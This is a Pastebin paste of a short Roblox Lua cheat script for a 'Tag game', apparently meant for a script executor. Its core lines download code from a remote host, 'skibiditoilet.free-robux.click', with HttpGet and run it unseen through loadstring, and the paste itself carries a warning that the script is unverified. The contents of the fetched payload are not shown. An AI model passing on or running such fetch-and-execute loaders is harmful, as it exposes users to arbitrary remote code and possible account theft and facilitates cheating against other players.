NothingYT960

Tag game

Jul 25th, 2024
438
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. --[[
  2. WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
  3. ]]
  4. -- // @ notes | tag all doesnt work that well on free for all i dont recommend using it
  5. -- // @ celery is not supported
  6. untitled, taggame = pcall(game.HttpGet, game, ('https://%s/%s'):format('skibiditoilet.free-robux.click', 'p/raw/bryvmasag5'));
  7. assert(untitled, 'Couldnt retrieve script,', taggame);
  8. loadstring(taggame)();
  9. game:GetService('UserInputService').MouseIconEnabled = true
Add Comment
Please, Sign In to add comment